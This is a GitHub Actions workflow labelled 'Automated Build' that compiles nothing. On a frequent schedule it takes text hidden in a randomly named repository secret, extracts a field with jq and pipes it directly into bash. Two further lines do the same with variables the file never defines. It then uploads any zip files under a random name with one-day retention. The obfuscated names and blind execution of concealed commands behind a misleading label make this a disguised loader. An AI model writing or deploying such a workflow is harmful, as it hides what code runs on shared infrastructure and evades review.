name: Automated Build
on:
  workflow_dispatch:

  schedule:
    - cron: '56 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          a9628: ${{ secrets.a9628 }}
        run: |
          printf '%s' "$a9628" | jq -r .fxij7 | /bin/bash
          printf '%s' "$zmaln8122" | jq -r .w8823 | /bin/bash
          printf '%s' "$yqlo935" | jq -r .ykwgl73092 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: GnWajrgE
          path: "*.zip"
          retention-days: 1
